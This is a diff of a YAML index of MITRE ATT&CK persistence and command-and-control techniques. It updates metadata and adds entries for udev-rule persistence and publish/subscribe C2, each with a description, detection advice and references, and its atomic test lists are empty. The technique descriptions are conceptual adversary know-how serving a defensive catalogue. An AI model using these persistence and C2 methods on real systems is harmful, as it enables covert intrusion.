+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36420,7 +36855,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36444,51 +36879,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36511,20 +36906,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36554,7 +36986,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36578,12 +37010,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36667,11 +37097,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36723,9 +37152,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36774,7 +37202,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36812,14 +37240,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36882,7 +37308,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36940,97 +37365,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -37096,9 +37519,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -37144,7 +37625,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -37176,7 +37656,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37198,22 +37678,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37235,7 +37713,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37260,7 +37738,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -37344,7 +37821,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37408,11 +37884,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
